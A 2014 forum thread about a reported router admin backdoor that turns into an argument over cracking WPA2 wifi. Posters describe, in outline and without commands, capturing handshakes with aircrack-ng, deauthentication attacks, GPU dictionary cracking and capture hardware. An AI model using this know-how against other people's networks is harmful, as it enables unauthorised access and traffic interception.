# Another router backdoor found!



## remixedcat (Jan 3, 2014)

*Gaping admin access holes found in SoHo routers from Linksys, Netgear and others*



> For many home users, the router-slash-firewall at the edge of their network plays an vital security role.
> 
> It acts as a stockade to keep crooks on the internet at arms' length, typically blocking inbound network connections by default.
> 
> ...



Read more here:
http://nakedsecurity.sophos.com/201...soho-routers-from-linksys-netgear-and-others/

List of affected routers:
http://wikidevi.com/w/index.php?tit...Global+type::~embedded*]]&p=format=broadtable


----------



## newtekie1 (Jan 4, 2014)

I think people are making larger deals out of both of these exploits.  They aren't possible from outside of the network, which means you have to let the person on your network before they can exploit them.  You should trust the people you let on your network any.  But even if you do let shady people on your wireless, what is the most they can do by getting access to your router's config page? Reset it to factory defaults, maybe get your wireless key(which they probably already have since you let them on your network)?  There isn't much harm that can be done by getting access to the router config, they are already on your network, there are far worse thing they could already be doing.  You yourself have already made a huge breach in security by allowing them on your network in the first place.


----------



## remixedcat (Jan 4, 2014)

sometimes going to the WAN IP you can access the router's config page. depends really.


----------



## newtekie1 (Jan 4, 2014)

remixedcat said:


> sometimes going to the WAN IP you can access the router's config page. depends really.



In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk(since it opens you up to a brute force). And I don't know of any SOHO router that comes with this option enabled by default.

This latest exploit however seems like it has to be exploited from the inside since the listening service that is used by the exploit only listens on the wireless interface.


----------



## silentbogo (Jan 11, 2014)

newtekie1 said:


> In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk(since it opens you up to a brute force). And I don't know of any SOHO router that comes with this option enabled by default.
> 
> This latest exploit however seems like it has to be exploited from the inside since the listening service that is used by the exploit only listens on the wireless interface.


You don't have to be trusted by the owner to gain access to the wireless network form the outside. 
With tools like aircrack-ng and similar you can get access to any WPA(2)/WPE protected network given enough time and effort.
The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check router's settings, if everything works the way it supposed to?).


----------



## brandonwh64 (Jan 11, 2014)

newtekie1 said:


> In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk(since it opens you up to a brute force). And I don't know of any SOHO router that comes with this option enabled by default.
> 
> This latest exploit however seems like it has to be exploited from the inside since the listening service that is used by the exploit only listens on the wireless interface.



Yea these routers have a new feature were you can sign up at linksys or cisco's website and it allows you to configure your router from the internet kinda like a domain for your home network. I played with one the other day and that was the first thing I disabled for the customer.


----------



## scoutingwraith (Jan 11, 2014)

Hmm. I am a bit lost in this but will this exploit apply to DD-WRT firmware i have installed on my Belkin Router?


----------



## newtekie1 (Jan 11, 2014)

silentbogo said:


> You don't have to be trusted by the owner to gain access to the wireless network form the outside.
> With tools like aircrack-ng and similar you can get access to any WPA(2)/WPE protected network given enough time and effort.
> The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check router's settings, if everything works the way it supposed to?).


WEP is pretty easy to crack, but no one should be using that anyway.  However, it is no trivial matter to crack WPA(2), the primary cracking tools for WPA actually exploit an issue with WPS(which again you should have turned off), they don't actually crack WPA.

But again, once they have access to your network, there are far worse things they can do than hack your router and change some settings.

I'm in my router viewing the settings pretty much weekly.



scoutingwraith said:


> Hmm. I am a bit lost in this but will this exploit apply to DD-WRT firmware i have installed on my Belkin Router?



No, the open source firmware shouldn't be affected by this.


----------



## Darr247 (Jan 15, 2014)

silentbogo said:


> With tools like aircrack-ng and similar you can get access to any WPA(2)/WPE protected network given enough time and effort.


 
Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character non-dictionary passphrase has been cracked.
Otherwise, "enough time" means centuries, if not millennia.


----------



## remixedcat (Jan 15, 2014)

Even Fluke Networks has a video how to crack wifi networks.


----------



## Darr247 (Jan 15, 2014)

Fluke has over 200 videos posted on youtube... that's hardly a cite.


----------



## remixedcat (Jan 15, 2014)




----------



## Darr247 (Jan 15, 2014)

That's not a crack; that's a deauthentication attack.
That's the equivalent of saying a Distributed Denial of Service attack is breaking into someone's computer.
Or that squirting all their locks full of epoxy will let you steal someone's car.

Running deauth attacks is just being a twit. I've got a 3 pound engineer's hammer I'd use on whoever's computer running those I tracked down with my TechnoLab mini-yagi...


----------



## remixedcat (Jan 15, 2014)

Well you can use it to get keys and stuff it's part of the process though. There are several ways to get the keys and this is one of them.


----------



## silentbogo (Jan 15, 2014)

Once you've captured 4 way handshake - you have a source to recover WPA2 password.
WPS not involved, no sledgehammer needed.
There is a better video showing how to hack WPA2 network using this method:








The only thing that's necessary at this point - is a decent set of dictionaries.

I performed the same procedure on my test network, which was protected by 11 character password(asked my cousin to set one up, to be fair), and it worked with 2GB+ dictionary.
The only limitation of this hacking technique is that it is viable only for dictionary cracking or small passwords, so if you are using 13(+)-symbol randomly generated mixed-case alphanumerical passphrase with special chars - you are relatively safe. Other than that - there are hundreds of different configurations of password libraries online, which existed since the time people were cracking zip-archives. I still have a CD with translit and keyboard-layut based dictionary for russian passwords laying somewhere around. 
Another thing that should be taken into account, is GPU processing. 
http://www.scmagazineuk.com/wifi-is-no-longer-a-viable-secure-connection/article/119294/
If such thing was possible in 2008, think what you can do with a modern GPU with 5 to 10 times as many shader processors and a lot more computing power.


----------



## remixedcat (Jan 15, 2014)

It's hard to get a lower priced laptop that has a decent GPU to do that processing though.


----------



## silentbogo (Jan 15, 2014)

You only need a laptop to capture the handshake. Processing could be done at home.


----------



## Darr247 (Jan 15, 2014)

silentbogo said:


> The only thing that's necessary at this point - is a decent set of dictionaries.


 
Except my spec was,
"Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character *non-dictionary* passphrase has been cracked."

Personally, I use the MD5 hash of the SHA1 hash of a non-dictionary word for a passphrase.
_e.g._
P1a2s3s4W5o6r7d
SHA1 = b30272e2a576f1d081ac4a4beb123bec5080ad31
MD5 (of SHA1 hash) = 4141de03e086dcf354135800d8c5973e
The only time it's a hassle is when you're associating a device with only an onscreen keyboard (instead of being able to copy+paste from the hash generator directly into wlassistant in linux distros, or WZC interface in windows).
Good luck building a dictionary for that.

I have my doubts about aircrack being able to reverse engineer those vectors even if 5 or more dictionary words are strung together with, say, the last letter of each word capitalized, either. _e.g._ thiS'SAsimplEyeTmostlYsecurEpassphrasE

I think all the apps run in that video are in the fedora security lab (FSL) spin, by the way:
32-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-i686-20.torrent
64-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-x86_64-20.torrent


----------



## remixedcat (Jan 15, 2014)

Since you know soooo muuuch about this you must know of a tool better then aircrack-ng???


----------



## Darr247 (Jan 15, 2014)

What's your budget?


----------



## remixedcat (Jan 15, 2014)

ummmmm like 20 dollars at most right now


----------



## Darr247 (Jan 16, 2014)

Then, no.

If you had said "unlimited" then I would've said
Cascade Pilot Personal Edition and an
AirPcap Nx 3-Pack.


----------

